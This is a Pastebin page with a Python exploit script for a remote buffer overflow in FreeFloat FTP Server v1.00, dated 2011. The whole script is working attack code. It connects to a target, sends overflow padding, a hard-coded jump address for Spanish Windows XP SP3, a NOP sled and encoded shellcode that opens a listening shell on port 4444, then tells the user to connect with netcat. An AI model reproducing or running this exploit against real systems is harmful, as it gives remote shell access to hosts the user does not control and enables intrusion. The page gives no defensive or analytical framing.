SHARE
TWEET

FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit

a guest Jul 28th, 2011 266 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. # FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit (No FTP Command Needed)
  4. # written by localh0t
  5. # Date: 29/07/11
  6. # Contact: mattdch0@gmail.com
  7. # Follow: @mattdch
  8. # www.localh0t.com.ar | www.mfsec.com.ar
  9. # Thanks to: Pr0zac, Irakirashia, Kchito
  10. # Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
  11. # Shellcode: List shell on port 4444 (Change as you wish)
  12.  
  13. from socket import *
  14. import sys, struct, os
  15.  
  16. if (len(sys.argv) < 3):
  17.         print "\nFreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit"
  18.         print "\n       Usage: %s <host> <port> \n" %(sys.argv[0])
  19.         sys.exit()
  20.  
  21. print "\n[!] Connecting to %s" %(sys.argv[1])
  22. # connect to host
  23. sock = socket(AF_INET,SOCK_STREAM)
  24. sock.connect((sys.argv[1],int(sys.argv[2])))
  25. sock.recv(1024)
  26.  
  27. # padding
  28. buffer = "A" * 251
  29.  
  30. # jmp esp (shell32.dll Windows XP SP3 Spanish)
  31. buffer += "\x4f\x31\x6b\x7e"
  32.  
  33. # NOPsled
  34. buffer += "\x90" * 20
  35.  
  36. # shellcode
  37. buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
  38. "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
  39. "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
  40. "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
  41. "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
  42. "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
  43. "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
  44. "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
  45. "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
  46. "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
  47. "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
  48. "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
  49. "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
  50. "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
  51. "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
  52. "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
  53. "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
  54. "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
  55. "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
  56. "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
  57. "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
  58. "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
  59. "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
  60. "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
  61. "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  62.  
  63. # end connection
  64. buffer += "\x0a"
  65.  
  66. # send buffer
  67. print "[!] Sending exploit..."
  68. sock.send(buffer)
  69. sock.recv(1024)
  70. sock.close()
  71. print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
  72. sys.exit()
RAW Paste Data
Want to get better at Python?
Learn to code Python in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top